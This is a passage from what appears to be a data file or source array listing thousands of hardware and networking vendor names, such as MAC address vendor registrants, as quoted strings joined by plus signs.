"Aegate Ltd", + "Cellon France", + "Pantech&Curitel Communications, Inc.", + "TeraRecon, Inc.", + "A. W. Communication Systems Ltd", + "Dilithium Networks", + "GreenPeak Technologies", + "Accedian Networks", + "Capelon AB", + "Kwang Woo I&C Co.,Ltd", + "SAT GmbH & Co.", + "Horizon Semiconductors Ltd.", + "Peltor Ab", + "Quantec Tontechnik", + "Dream Technologies Corporation", + "Kolektor group", + "Plustek.INC", + "D-MAX Technology Co.,Ltd", + "Polymap Wireless LLC", + "DekTec Digital Video B.V.", + "OSI Security Devices", + "Acro Telecom", + "AwarePoint Corporation", + "Wonde Proud Technology Co., Ltd", + "Cube Technologies", + "Kprotech Co., Ltd.", + "Dainippon Pharmaceutical Co., Ltd.", + "Precise Automation, Inc.", + "AsGa S.A.", + "Shenzhen Syscan Technology Co.,Ltd.", + "Consumer Technologies Group, LLC", + "Sonoa Systems, Inc", + "M2i Corporation", + "Zurich University of Applied Sciences", + "Nokota Communications, LLC", + "Synchronous Communication Corp", + "UbONE Co., Ltd", + "Core Micro Systems Inc.", + "Senhai Electronic Technology Co., Ltd.", + "Naeil Community", + "Gassner Wiege- und Meßtechnik GmbH", + "Datasym POS Inc.", + "Kyuden Technosystems Corporation", + "Communication System Design & Manufacturing (CSDM)", + "DigitalZone Co., Ltd.", + "Symstream Technology Group Ltd", + "U.S. Robotics Corporation", + "Vitelcom Mobile Technology", + "Tele Power Inc.", + "Protronic (Far East) Ltd.", + "Multilink Inc", + "Cryptosoft", + "HS Automatic ApS", + "CelPlan International, Inc.", + "American Technology Integrators", + "Grundfos Holding", + "GSTeletech Co.,Ltd.", + "Wavefront Semiconductor", + "Kingjon Digital Technology Co.,Ltd", + "Sysmaster Corporation", + "Netsnapper Technologies SARL", + "PDL Electronics Ltd", + "Edata Communication Inc.", + "Koncept International, Inc.", + "Merry Electrics CO., LTD.", + "Total Wireless Technologies Pte. Ltd.", + "G-Links networking company", + "C4Line", + "Federal State Unitary Enterprise Leningrad R&D Institute of", + "Sperian Protection Instrumentation", + "Go Networks", + "WEPIO Co., Ltd.", + "t+ Medical Ltd", + "Page Iberica, S.a.", + "KIRK telecom A/S", + "Intelligent Systems", + "Taiwan Thick-Film Ind. Corp.", + "Telefon-Gradnja d.o.o.", + "LifeSize Communications, Inc", + "Rkc Instrument Inc.", + "PacketMotion, Inc.", + "Neturity Technologies Inc.", + "Dynalab, Inc.", + "Application Technologies and Engineering Research Laboratory", + "27M Technologies AB", + "BLwave Electronics Co., Ltd", + "PanelLink Cinema, LLC", + "Eab/Rwi/K", + "Valox Systems, Inc.", + "Hymatom Sa", + "ReadyLinks Inc", + "Tianjin 712 Communication Broadcasting co., ltd.", + "RyCo Electronic Systems Limited", + "Sling Media, Inc.", + "Appear AS", + "Radiance Technologies, Inc.", + "Fargo Electronics Inc.", + "Artila Electronics Co., Ltd.", + "Jiangsu Yitong High-Tech Co.,Ltd", + "Zetta Systems, Inc.", + "Motion Reality Inc.", + "International Games System Co., Ltd.", + "Asiamajor Inc.", + "L-S-B Broadcast Technologies GmbH", + "Amedia Networks Inc.", + "Spectec Computer Co., Ltd.", + "Agat Soft LLC", + "ZIEHL industrie-elektronik GmbH + Co KG", + "It-Factory, Inc.", + "Abbey Systems Ltd", + "DAQ Electronics, Inc.", + "Cap Co., Ltd.", + "Vita", + "intec GmbH", + "Dolphin Interconnect Solutions AS", + "Surf Communications Inc.", + "Silink", + "Zellweger Analytics, Inc.", + "FSI Systems, Inc.", + "Avolites Ltd.", + "HLS HARD-LINE Solutions Inc.", + "ELPRO Technologies", + "Millennial Net", + "a2i marketing center", + "KeRo Systems ApS", + "Griffin Technology", + "Qovia", + "Digital Everywhere Unterhaltungselektronik GmbH", + "Gizmondo Europe Ltd", + "IRT Electronics Pty Ltd", + "STB Datenservice GmbH", + "Q-Free ASA", + "LeapComm Communication Technologies Inc.", + "Panasonic Corporation", + "Enerdyne Technologies, Inc.", + "University of California, Berkeley", + "Rane Corporation", + "Institute of Network Technologies", + "NeoMedia Europe AG", + "Starnex Co., Ltd.", + "Avix Inc.", + "Advanced Telecommunication Technologies, Inc.", + "AboCom", + "Decrane Aerospace - Audio International Inc.", + "Keiyo System Research, Inc.", + "Korg Inc.", + "ConSentry Networks", + "Andrew Corporation", + "Japan Direx Corporation", + "BroadEasy Technologies Co.,Ltd", + "Skardin (UK) Ltd", + "Data Ltd.", + "Harding Instruments", + "WORLDSAT - Texas de France", + "Tixi.Com", + "U-MEDIA Communications, Inc.", + "Tandberg Data ASA", + "Transceiving System Technology Corporation", + "United Fiber Optic Communication", + "AESYS S.p.A.", + "Octalix B.V.", + "Inner Range Pty. Ltd.", + "Cadco Systems", + "WideRay Corp", + "Ubisense Limited", + "Prism Media Products Limited", + "Monitoring Technologies Limited", + "2wcom Systems GmbH", + "Star Micronics Co.,Ltd.", + "NetStreams, LLC", + "Pharos Systems NZ", + "Matisse Networks Inc", + "Gsc Srl", + "Digital Data Communications Asia Co.,Ltd", + "EMS Satcom", + "Infilco Degremont Inc.", + "LanReady Technologies Inc.", + "JStream Technologies Inc.", + "InterEnergy Co.Ltd,", + "Intellambda Systems, Inc.", + "Coaxial Networks, Inc.", + "Kn Soltec Co.,Ltd.", + "MediaCell, Inc.", + "Grandeye Ltd", + "Proliphix Inc.", + "Micronet Communications Inc.", + "WAVE Corporation", + "Allnet GmbH", + "Eurocom Industries A/S", + "e-w/you Inc.", + "DELCOMp", + "Tevebox AB", + "CallURL Inc.", + "Force, Inc.", + "Digium", + "Applied Wireless Identifications Group, Inc.", + "Optinel Systems, Inc.", + "Glorytek Network Inc.", + "Valcretec, Inc.", + "Venstar Inc.", + "Ceicom", + "CIMSYS Inc", + "Cavium", + "Telexy", + "PC Fabrik", + "Synchrony, Inc.", + "Canon Korea Inc.", + "Coteau Vert Co., Ltd.", + "Maxanna Technology Co., Ltd.", + "ADDO-Japan Corporation", + "Mortara Instrument, Inc.", + "PAL Pacific Inc.", + "UBSTORAGE Co.,Ltd.", + "Northover Solutions Limited", + "Kyushu-kyohan co.,ltd", + "Tivella Inc.", + "Optical Internetworking Forum", + "DUALi Inc.", + "W-Linx Technology Co., Ltd.", + "ELECOM Co.,LTD Laneed Division", + "WideView", + "Delta Information Systems, Inc.", + "Datawire Communication Networks Inc.", + "Continuum Photonics Inc", + "FAST TV-Server AG", + "Vavic Network Technology, Inc.", + "Lifetron Co.,Ltd", + "Dentum Co.,Ltd", + "Arce Sistemas, S.A.", + "DigitAll World Co., Ltd", + "Vulcan Portals Inc", + "WayTech Development, Inc.", + "Festo AG & Co. KG", + "Sandmartin(zhong shan)Electronics Co.,Ltd", + "Orban", + "Ezquest Inc.", + "Aac Electronics Corp.", + "Gaming Support B.V.", + "Clear Edge Networks", + "Digicube Technology Co., Ltd", + "C-Tech United Corp.", + "YOKO Technology Corp.", + "Privaris, Inc.", + "Logic Controls, Inc.", + "Iskra Transmission d.d.", + "Custom Engineering", + "Chiyu Technology Co.,Ltd", + "bitWallet, Inc.", + "PROFIBUS Nutzerorganisation e.V.", + "MYNAH Technologies", + "Burdick, a Quinton Compny", + "HASHIMOTO Electronics Industry Co.,Ltd.", + "Spectrum Digital, Inc", + "Fujiya Denki Seisakusho Co.,Ltd.", + "Endace Technology", + "Formosa Teletek Corporation", + "3B System Inc.", + "Micro-Research Finland Oy", + "Ecastle Electronics Co., Ltd.", + "Trajet GmbH", + "atrium c and i", + "Infinity Tech", + "Clematic", + "Ample Communications Inc.", + "Beijing Newtry Electronic Technology Ltd", + "Soronti, Inc.", + "HEINESYS, Inc.", + "Safari Technologies", + "Dynamic Ratings P/L", + "Ultracker Technology CO., Inc", + "ARION Technology Inc.", + "Adaptive Micro Systems Inc.", + "Tadlys LTD", + "IRIS Corporation Berhad", + "NEOSMART Corp.", + "Dynavac Technology Pte Ltd", + "First Communication, Inc.", + "PC Engines GmbH", + "Japan Image & Network Inc.", + "Opti-cell, Inc.", + "Eclipse (HQ Espana) S.L.", + "Online Development Inc", + "Nasaco Electronics Pte. Ltd", + "Napatech Aps", + "Sanko Electric Co,.Ltd", + "Japan CBM Corporation", + "Airwave Technologies Inc.", + "Petcomkorea Co., Ltd.", + "ASIP Technologies Inc.", + "CMA/Microdialysis AB", + "Primagraphics Limited", + "ROBE Show lighting", + "Amesys Defense", + "Funkwerk Dabendorf GmbH", + "SANYCOM Technology Co.,Ltd", + "Fujitsu I-Network Systems Limited.", + "Xylem Water Solutions", + "Real Digital Media", + "M & N GmbH", + "Akatsuki Electric Mfg.co.,Ltd.", + "Call Image Sa", + "Siemens AG ICM MP UC RD IT KLF1", + "Newbest Development Limited", + "i.Tech Dynamic Ltd", + "MDI Security Systems", + "P&E Microcomputer Systems, Inc.", + "Seaway Networks Inc.", + "DIVR Systems, Inc.", + "Tottori SANYO Electric Co., Ltd.", + "Parker SSD Drives", + "PAC International Ltd", + "Scanmatic AS", + "Wilhelm Rutenbeck GmbH&Co.KG", + "UHS Systems Pty Ltd", + "AV Digital", + "Trek Diagnostics Inc.", + "Rolls-Royce", + "Cubic Transportation Systems Inc", + "Citizen Watch Co., Ltd.", + "Ailocom Oy", + "MemoryLink Corp.", + "PrimeNet", + "Chongho information & communications", + "NV ADB TTV Technologies SA", + "Nergal s.r.l.", + "WolfVision Gmbh", + "Xeline Co., Ltd.", + "synertronixx GmbH", + "SFOM Technology Corp.", + "M. K. Juchheim GmbH & Co", + "Ka-Ro electronics GmbH", + "Tiptel AG", + "Jamex, Inc.", + "Schneider Electric (Australia)", + "Opelcomm Inc.", + "Teikoku Electric Mfg. Co., Ltd", + "Nanjing Huazhuo Electronics Co., Ltd.", + "SigmaTel, Inc.", + "BTU International", + "Rancho Technology, Inc.", + "XtremeSpectrum, Inc.", + "Micro-Optronic-Messtechnik GmbH", + "PNI Corporation", + "Guangdong Province Electronic Technology Research Institute", + "Broadbus Technologies", + "Iftest AG", + "Appro Technology Inc.", + "Gemstone Communications, Inc.", + "Zultys Technologies", + "TOHOKU RICOH Co., LTD.", + "HIMS International Corporation", + "Beijing Lanchuan Tech. Co., Ltd.", + "Zenisu Keisoku Inc.", + "Oxance", + "KaVo Dental GmbH & Co. KG", + "Geomation, Inc.", + "Altech Controls", + "Crest Audio", + "Megatel Computer (1986) Corp.", + "MACKIE Engineering Services Belgium BVBA", + "Pedestal Networks, Inc", + "Cygnus Microsystems (P) Limited", + "Actel Corporation", + "Key Stream Co., Ltd.", + "Aoip", + "Akcp", + "Industrial Scientific Corp.", + "DORMA Time + Access GmbH", + "eBet Gaming Systems Pty Ltd", + "NiceTechVision", + "Yasing Technology Corp.", + "Vidisco ltd.", + "MITEQ Inc.", + "Flextronics", + "China IWNComm Co., Ltd.", + "Sysnet Telematica srl", + "RDC Semiconductor Inc.,", + "cd3o", + "Nvergence, Inc.", + "Aeronix, Inc.", + "Remopro Technology Inc.", + "ICET S.p.A.", + "Kihoku Electronic Co.", + "Iosoft Ltd.", + "Load Technology, Inc.", + "Media Streaming Networks Inc", + "X-COM, Inc.", + "American Reliance Inc.", + "Kaleidescape", + "Addvalue Communications Pte Ltd", + "Astronautics C.A LTD", + "Neue ELSA GmbH", + "Air2U, Inc.", + "Corrent Corporation", + "Pillar Data Systems", + "Traverse Technologies Australia", + "Core Tec Communications, LLC", + "Visiowave Sa", + "Productivity Systems, Inc.", + "Quad Bit System co., Ltd.", + "Anthology Solutions Inc.", + "EG Technology", + "Gennum Corporation", + "Vindicator Technologies", + "Zambeel Inc", + "G-Star Communications Inc.", + "Aeluros", + "Industrial Defender, Inc.", + "Platypus Technology", + "ADInstruments", + "BiTMICRO Networks, Inc.", + "Koatsu Gas Kogyo Co., Ltd.", + "Eliop S.a.", + "Cathay Roxus Information Technology Co. LTD", + "Allworx Corp.", + "Microscan Systems, Inc.", + "Clarion (M) Sdn Bhd", + "Cygnal Integrated Products, Inc.", + "Scion Corporation", + "Clarity Design, Inc.", + "Fuyoh Video Industry CO., LTD.", + "Rosemount Process Analytical", + "Fa. GIRA", + "Arcon Technology Limited", + "Pipal Systems", + "Fresnel Wireless Systems", + "Pannaway Technologies, Inc.", + "Aska International Inc.", + "Cedar Point Communications", + "Invacom Ltd", + "Calamp Wireless Networks Inc", + "FingerTec Worldwide Sdn Bhd", + "Carel s.p.a.", + "GreenNET Technologies Co.,Ltd.", + "HITACHI Maxell Ltd.", + "GyroSignal Technology Co., Ltd.", + "Intronics, Incorporated", + "Beida Jade Bird Huaguang Technology Co.,Ltd", + "Autostar Technology Pte Ltd", + "Futuretel", + "eM Technics Co., Ltd.", + "Daewoo Teletech Co., Ltd", + "OPNET Technologies CO., LTD.", + "Compunetix, Inc", + "AltiGen Communications Inc.", + "Eurotherm Limited", + "Targa Systems Ltd.", + "LoPA Information Technology", + "Procera Networks, Inc.", + "W2 Networks, Inc.", + "Creval Systems, Inc.", + "Telkonet Inc.", + "corega K.K", + "Movistec", + "BlueWINC Co., Ltd.", + "Transtech Networks", + "HBrain", + "KINGENE Technology Corporation", + "Hudson Soft Co.,Ltd.", + "Active Tchnology Corporation", + "QSI Systems Inc.", + "ART WARE Telecommunication Co., Ltd.", + "Yamaki Electric Corporation", + "Alcon Laboratories, Inc.", + "Emerson Network Power Co.,Ltd", + "YEM Inc.", + "6Wind", + "Silicon Data, Inc", + "Stream Labs", + "Imerge Ltd", + "SUNIX Co., Ltd.", + "Widax Corp.", + "Angel Iglesias S.A.", + "KNC One GmbH", + "Identicard Systems Incorporated", + "Artnix Inc.", + "Akom Technology Corporation", + "MAKU Informationstechik GmbH", + "Kisan Telecom Co., Ltd.", + "Okano Electric Co.,Ltd", + "Racewood Technology", + "Apogee Imaging Systems", + "Time Management, Inc.", + "Innopia Technologies, Inc.", + "Bartech Systems International, Inc", + "Aztek, Inc.", + "Newisys,Inc.", + "Entropic Communications, Inc.", + "Imi Technology Co., Ltd", + "Tachyon, Inc", + "Cloverleaf Communications Inc.", + "Intelligent Platforms, LLC.", + "Rdi", + "Allot Communications", + "Mayekawa Mfg. Co. Ltd.", + "Leader Electronics Corp.", + "UNIK C&C Co.,Ltd.", + "Trilogy Communications Ltd", + "MONDIAL electronic", + "Systec Co., Ltd.", + "A&D Co., Ltd.", + "Telebau GmbH", + "Planmeca Oy", + "MDS Gateways", + "Aptus Elektronik AB", + "E.F. Johnson", + "NetExcell", + "XENPAK MSA Group", + "Avistar Communications Corporation", + "Philips Consumer Communications", + "Samsung Techwin Co.,Ltd", + "Simple Access Inc.", + "Computrols Inc.", + "Dibal,S.a.", + "Next Generation Systems, Inc.", + "NextGig", + "SHI ControlSystems,Ltd.", + "How Corporation", + "Gigaphoton Inc.", + "Access Devices Limited", + "Adept Systems Inc.", + "EdgeWave", + "Jascom Co., Ltd", + "Fasy S.p.A.", + "LodgeNet Entertainment Corp.", + "Canadian Bank Note Company, Ltd.", + "ShenZhen Unitone Electronics Co., Ltd.", + "DivergeNet, Inc.", + "Banksys", + "Sanrad Intelligence Storage Communications (2000) Ltd.", + "Key Technology, Inc.", + "Quake Technologies", + "Avilinks Sa", + "Sigma-Links Inc.", + "Acme Packet", + "Pou Yuen Tech Corp. Ltd.", + "Index Braille AB", + "Accel Technologies Inc.", + "Bridgeco Co AG", + "Atek Co, Ltd.", + "VDS Vosskuhler GmbH", + "Kaba Benzing GmbH", + "NetZerver Inc.", + "Identix Inc.", + "Juyoung Telecom", + "Air Products and Chemicals, Inc.", + "The Imaging Source Europe", + "TURCK, Inc.", + "Sierra Automated Systems", + "Ilinx Co., Ltd.", + "e-Watch Inc.", + "Simple Devices, Inc.", + "Netpower Co., Ltd.", + "Elektronikspecialisten i Borlange AB", + "Clipcomm, Inc.", + "Stralfors AB", + "Danfoss A/S", + "VCS Video Communication Systems AG", + "Eastman Kodak Company", + "Radlan Computer Communications Ltd.", + "China Great-Wall Computer Shenzhen Co., Ltd.", + "Novasonics", + "VIASYS Healthcare GmbH", + "Corvalent Corporation", + "Millimetrix Broadband Networks", + "Italiana Macchi SpA", + "iCanTek Co., Ltd.", + "J & S Marine Ltd.", + "Finedigital Inc.", + "Tri-M Engineering / Nupak Dev. Corp.", + "Wieland Electric GmbH", + "IPM-Net S.p.A.", + "Alpha Telecom, Inc. U.S.A.", + "INNOWELL Corp.", + "Etrali S.A.", + "Jotron Electronics A/S", + "Leaf Imaging Ltd.", + "Acterna", + "Unicom Automation Co., Ltd.", + "Westerstrand Urfabrik AB", + "RFNET Technologies Pte Ltd (S)", + "A5TEK Corp.", + "Varex Imaging", + "Endress & Hauser GmbH & Co", + "Tenovis GmbH & Co KG", + "Ophir-Spiricon LLC", + "Jung Myung Telecom Co., Ltd.", + "Sheba Systems Co., Ltd.", + "Global Data", + "Quantitative Imaging Corporation", + "Citel Technologies Ltd.", + "Celsian Technologies, Inc.", + "Human Technology Co., Ltd.", + "Sunny Giken, Inc.", + "MBM Technology Ltd.", + "Datasound Laboratories Ltd", + "Strix Systems", + "Ensure Technologies, Inc.", + "PT Inovacao", + "Intruvert Networks, Inc.", + "Zetari Inc.", + "Vision Components GmbH", + "Notebook Development Lab. Lenovo Japan Ltd.", + "Narad Networks Inc", + "Abeona Networks Inc", + "Tactel AB", + "Itcn", + "Seedsware, Inc.", + "W-Link Systems, Inc.", + "Intersoft Co.", + "Mobillian Corporation", + "Spectrum Control, Inc.", + "AirRunner Technologies, Inc.", + "Omnitron Systems Technology, Inc.", + "Invicta Networks, Inc.", + "Sungjin C&C Co., Ltd.", + "PacketAir Networks, Inc.", + "Speedcom Wireless", + "DAP Technologies", + "Flaga HF", + "Hitron Technology, Inc.", + "Digital Network Alacarte Co., Ltd.", + "Electronic Design Associates, Inc.", + "Area Netwoeks, Inc.", + "IPmental, Inc.", + "Sun Communications, Inc.", + "Snell", + "JustEzy Technology, Inc.", + "Northern Digital, Inc.", + "Topspin Communications, Inc.", + "ASB Technology BV", + "DRS Test and Energy Management or DRS-TEM", + "Zeus Wireless, Inc.", + "Mosaic Systems Inc.", + "Cirkitech Electronics Co.", + "Cyber Fone, Inc.", + "Pultek Corp.", + "ShareGate, Inc.", + "Metavector Technologies", + "Traficon N.V.", + "Infinite Shanghai Communication Terminals Ltd.", + "Inetcam, Inc.", + "Acronet Co., Ltd.", + "Naray Information & Communication Enterprise", + "Nuark Co., Ltd.", + "Magic Control Technology Corporation", + "VTLinx Multimedia Systems, Inc.", + "3ware, Inc.", + "Lucent Technologies", + "Chung Nam Electronic Co., Ltd.", + "Seiwa Electronics Co.", + "Baydel Ltd.", + "SM Information & Communication", + "Merilus, Inc.", + "Andiamo Systems, Inc.", + "National Enhance Technology, Inc.", + "Pacific Corporation", + "Kowa Company, Ltd.", + "Salira Optical Network Systems", + "RF Innovations Pty Ltd", + "IQ Wireless GmbH", + "Airocon, Inc.", + "SMART Modular Technologies", + "HORIBA, Ltd.", + "Hive Internet, Ltd.", + "Nayna Networks, Inc.", + "Technovision, Inc.", + "Tsinghua Unisplendour Co., Ltd.", + "Breezecom, Ltd.", + "Procket Networks", + "Tellus Group Corp.", + "Computer Generation Inc.", + "YAFO Networks, Inc.", + "Temia Vertriebs GmbH", + "Econolite Control Products, Inc.", + "Scalant Systems, Inc.", + "Omitec Instrumentation Ltd.", + "Proview Electronics Co., Ltd.", + "Extenway Solutions Inc", + "KDD Media Will Corporation", + "Stratex Networks, Inc.", + "Videotek, Inc.", + "Infiniswitch Corporation", + "IER, Inc.", + "AVOC Nishimura Ltd.", + "Commtech, Inc.", + "NetEnabled, Inc.", + "Rosco Entertainment Technology, Inc.", + "Intelligent Telecommunications, Inc.", + "ESTeem Wireless Modems, Inc", + "Cyberboard A/S", + "Accelent Systems, Inc.", + "Sarian Systems, Ltd.", + "Photonex Corporation", + "ipUnplugged AB", + "Cyber Technology Co., Ltd.", + "IPrad", + "Legrand", + "Parks S/A Comunicacoes Digitais", + "Asus Network Technologies, Inc.", + "Sage Systems", + "Makino Milling Machine Co., Ltd.", + "ACN Technologies", + "Osaki Electric Co., Ltd.", + "NetBurner", + "Seneca Networks", + "Netous Technologies, Ltd.", + "Atmel Corporation", + "Bridgeworks Ltd.", + "Apogee Electronics Corp.", + "Crossbeam Systems, Inc.", + "Redfern Broadband Networks", + "Atrica", + "Logostek Co. Ltd.", + "Jenoptik", + "Western Multiplex Corporation", + "BEKA Elektronik", + "Veristar Corporation", + "ICU Medical, Inc.", + "IA Link Systems Co., Ltd.", + "Emerson Energy Systems AB", + "Unixtar Technology, Inc.", + "Allied Advanced Manufacturing Pte, Ltd.", + "Miraesys Co., Ltd.", + "Prüftechnik Condition Monitoring GmbH & Co. KG", + "PAC Interactive Technology, Inc.", + "Widcomm, Inc.", + "DigitalSis", + "Colubris Networks", + "MAVIX, Ltd.", + "HIPER Information & Communication, Inc.", + "EZ Cast Co., Ltd.", + "SiConnect", + "Connect One", + "America Online, Inc.", + "PCS Revenue Control Systems, Inc.", + "Fastfame Technology Co., Ltd.", + "KOANKEISO Co., Ltd.", + "Muxcom, Inc.", + "Takaya Corporation", + "PORTech Communications, Inc.", + "Control Microsystems", + "Graphtec Technology, Inc.", + "Runtop, Inc.", + "Nicon Systems (Pty) Limited", + "Acomz Networks Corp.", + "Vidicode Datacommunicatie B.V.", + "Tateyama System Laboratory Co., Ltd.", + "Daiden Co., Ltd.", + "Condev Ltd.", + "L-3 Communication Aviation Recorders", + "Cellvision Systems, Inc.", + "Svenska Hardvarufabriken AB", + "Welltech Computer Co., Ltd.", + "Merlin Systems, Inc.", + "Cyras Systems, Inc.", + "Telesoft Technologies Ltd.", + "AM Communications, Inc.", + "Secure Works, Inc.", + "Fusion In Tech Co., Ltd.", + "Information Equipment Co., Ltd.", + "Kreatel Communications AB", + "Solid Data Systems", + "UniData Communication Systems, Inc.", + "Arima Computer Corp.", + "DX Antenna Co., Ltd.", + "Baumuller Aulugen-Systemtechnik GmbH", + "Equipe Communications", + "ClickTV", + "TriState Ltd.", + "EndPoints, Inc.", + "OPT Machine Vision Tech Co., Ltd", + "dotRocket, Inc.", + "LITE-ON Communications, Inc.", + "Bromax Communications, Ltd.", + "Vivace Networks", + "CC&C Technologies, Inc.", + "Adept Telecom", + "BCM Computers Co., Ltd.", + "Thermalogic Corporation", + "Harris Government Communications", + "High Technology Ltd", + "Accordion Networks, Inc.", + "Twinhead International Corp", + "Great Dragon Information Technology (Group) Co., Ltd.", + "Raysis Co., Ltd.", + "Shenzhen SED Information Technology Co., Ltd.", + "Telital R&D Denmark A/S", + "IFM Electronic gmbh", + "IOI Technology Corporation", + "Tommy Technologies Corp.", + "DNE Technologies", + "Spectrum Controls, Inc.", + "UK Grid Solutions Limited", + "Mu Net, Inc.", + "Ingersoll-Rand", + "Imperial Technology, Inc.", + "INIT GmbH", + "C-Cor", + "Aculab PLC", + "Zuma Networks", + "Chromisys, Inc.", + "Camtel Technology Corp.", + "S.d.e.l.", + "Gefran Spa", + "CoNet Communications, Inc.", + "Digital Processing Systems, Inc.", + "Netsensity, Inc.", + "SKF (U.K.) Limited", + "Peterson Electro-Musical Products, Inc.", + "Precision Electronic Manufacturing", + "WIN Enterprises, Inc.", + "International Microsystems, In", + "TurboComm Tech Inc.", + "Sena Technologies, Inc.", + "Sieb & Meyer Ag", + "Logitec Corporation", + "ELMEX Co., LTD.", + "CarrierComm Inc.", + "Alitec", + "Inkel Corp.", + "ESE Embedded System Engineer'g", + "Centos, Inc.", + "Turin Networks, Inc.", + "ADTEK System Science Co., Ltd.", + "Anite Telecoms", + "Freecom Technologies GmbH", + "ISDN Communications, Ltd.", + "Geocast Network Systems, Inc.", + "Microlink Corporation", + "SMAR Laboratories Corp.", + "Leadtek Research Inc.", + "Sollae Systems Co., Ltd.", + "Expand Networks", + "NetWorth Technologies, Inc.", + "Nextcell, Inc.", + "Symmetricom", + "British Federal Ltd.", + "EZ Digital Co., Ltd.", + "EnjoyWeb, Inc.", + "Universal Talkware Corporation", + "System Talks Inc.", + "iDigm Inc.", + "KDC Corp.", + "Cable Print", + "Tesco Controls, Inc.", + "Tdt Ag", + "AirSwitch Corporation", + "Firewiredirect.com, Inc.", + "Archtek Telecom Corporation", + "City-Net Technology, Inc.", + "Kontron Electronics AG", + "Kanda Tsushin Kogyo Co., Ltd.", + "Leiser GmbH", + "Space CyberLink, Inc.", + "Starboard Storage Systems", + "Bosch Security Systems, Inc.", + "Redflex Communication Systems", + "PLANET Technology Corporation", + "Fong Kai Industrial Co., Ltd.", + "1Net Corporation", + "Dynapro Systems, Inc.", + "Cnf Mobile Solutions, Inc.", + "Idream Technologies, Pte. Ltd.", + "Intersil Corp.", + "HMS Industrial Networks", + "Versa Technology", + "Lara Technology, Inc.", + "Fujitsu Siemens Computers", + "MICRILOR, Inc.", + "Timing Applications, Inc.", + "Tachion Networks, Inc.", + "Advanced Technology & Systems", + "MobyTEL", + "TrunkNet", + "Oxford Semiconductor Ltd.", + "Adlink Technology, Inc.", + "Mindready Solutions, Inc.", + "San Valley Systems, Inc.", + "Macromate Corp.", + "Chiyoda System Riken", + "Rfm", + "Lightwave Communications, Inc.", + "Powerfile, Inc.", + "Tyco Submarine Systems, Ltd.", + "Cp Clare Corp.", + "Allwell Technology Corp.", + "Orbacom Systems, Inc.", + "Telica, Inc.", + "Active Power", + "Allied Telesyn Internaional", + "Gma Communication Manufact'g", + "Cybernetics Tech. Co., Ltd.", + "Taiwan First Line Elec. Corp.", + "Conexant Systems, Inc.", + "Toko Inc.", + "Opicom", + "Ivron Systems", + "Rocketchips, Inc.", + "Tq - Components Gmbh", + "American Communication", + "Acute Communications Corp.", + "Next Nets Corporation", + "Alidian Networks, Inc.", + "Qwes. Com, Inc.", + "Xrosstech, Inc.", + "Mic Associates, Inc.", + "Acroloop Motion Control", + "Mahlo Gmbh & Co. Ug", + "Industrial Logic Corporation", + "Fivemere, Ltd.", + "Thomas & Betts Corp.", + "Unex Technology Corporation", + "Shinano Kenshi Co., Ltd.", + "Sunrise Telecom, Inc.", + "Ibond Inc.", + "Sycamore Networks", + "Microfirst Inc.", + "Smartsan Systems, Inc.", + "Sysmate Co., Ltd.", + "Genoa Technology, Inc.", + "Ambit Microsystems Corp.", + "Optima Tele.com, Inc.", + "Applied Automation, Inc.", + "Exabyte Corporation", + "Logibag", + "Campbell Scientific, Inc.", + "Atan Technology Inc.", + "Lanbird Technology Co., Ltd.", + "Impresstek Co., Ltd.", + "Comda Enterprises Corp.", + "Epilog Corporation", + "Kmc Controls", + "Dynacolor, Inc.", + "Broadlogic", + "Mrt Micro, Inc.", + "Urmet Tlc S.p.a.", + "Linkup Systems Corporation", + "Sensormatic Electronics LLC", + "Infolibria", + "Sierra Monitor Corp.", + "Telstrat", + "Pan-International Industrial Corp.", + "Hakusan Corporation", + "Tsinghua Novel Electronics", + "Tandberg Telecom As", + "Tek Digitel Corporation", + "Hakko Electronics Co., Ltd.", + "CMC Electronics Inc", + "Electronic Industries Association", + "Jatom Systems, Inc.", + "Cambex Corporation", + "Corder Engineering Corporation", + "Soyo Computer, Inc.", + "Technologies Lyre Inc.", + "Prolific Technology, Inc.", + "Beijer Electronics Products AB", + "Asaca Corporation", + "Chromatis Networks, Inc.", + "Mayan Networks", + "Rioworks Solutions, Inc.", + "Genrad Ltd.", + "Olicom A/S", + "Maspro Denkoh Corp.", + "PixStream Incorporated", + "Olencom Electronics", + "Gatan, Inc.", + "Iwatsu Electric Co., Ltd.", + "Cms Technologies", + "Kouwell Electronics Corp. **", + "Ad Systems Corp.", + "GLOBAL NET INFORMATION CO., Ltd.", + "Fast Multimedia Ag", + "G-Connect", + "Siemens Telecommunication Systems Limited", + "Zonet Technology, Inc.", + "Panasonic Electric Works Co., Ltd.", + "Entrega Technologies, Inc.", + "Sci Manufacturing Singapore Pte, Ltd.", + "Alpha-Top Corporation", + "SPE Systemhaus GmbH", + "Globaloop, Ltd.", + "Hammer Storage Solutions", + "Applied Innovation Inc.", + "Ito Electric Industry Co, Ltd.", + "Ent-Empresa Nacional De Telecommunicacoes, S.a.", + "Markem-Imaje", + "Ivex", + "Zac", + "Tellus Technology Inc.", + "N.v. Philips Industrial Activities", + "Valid Networks, Inc.", + "Ifp", + "MMC-EMBEDDED COMPUTERTECHNIK GmbH", + "NovaNET Learning, Inc.", + "Tag Electronic Systems", + "Leichu Enterprise Co., Ltd.", + "Dexdyne, Ltd.", + "Dynarc, Inc.", + "Systran Corp.", + "Osprey Technologies, Inc.", + "Agranat Systems", + "Netcom Sicherheitstechnik Gmbh", + "Portwell, Inc.", + "Abb Power T&D Company, Inc.", + "System Create Corp.", + "Samsan Corp.", + "Golden Enterprises, Inc.", + "Teco Information Systems", + "Distributed Processing Technology", + "Omnitronix, Inc.", + "Softronics Usb, Inc.", + "Imasde Canarias, S.a.", + "Fujitsu Microelectronics, Inc.", + "Mettler-Toledo (Albstadt) Gmbh", + "Icom Inc.", + "Alpha Telecom, Inc.", + "Harmonic Video Systems Ltd.", + "Spectralink, Inc", + "Philips Analytical X-Ray B.v.", + "Kawasaki Heavy Industries, Ltd", + "Advanced Fibre Communications", + "Allied Telesis, K.k.", + "Clientec Corporation", + "Edmi", + "Avex Electronics Inc.", + "Atlantic Network Systems", + "Parker Hannifin Corporation Compumotor Division", + "Aspect Communications", + "Daewoo Electronics Co., Ltd.", + "Draeger Medical", + "Hitachi Software Engineering", + "Accesslan Communications, Inc.", + "Processor Systems (I) Pvt Ltd", + "OOmon Inc.", + "Sonus Networks, Inc.", + "Csi-Control Systems", + "Nuera Communications, Inc.", + "Enable Semiconductor, Inc.", + "AmbiCom, Inc.", + "Maxtor Corp.", + "No Wires Needed Bv", + "Cmicro Corporation", + "CYQ've Technology Co., Ltd.", + "Cornet Technology, Inc.", + "Williams Communications Group", + "Alta Technology", + "Metawave Communications", + "Vertical 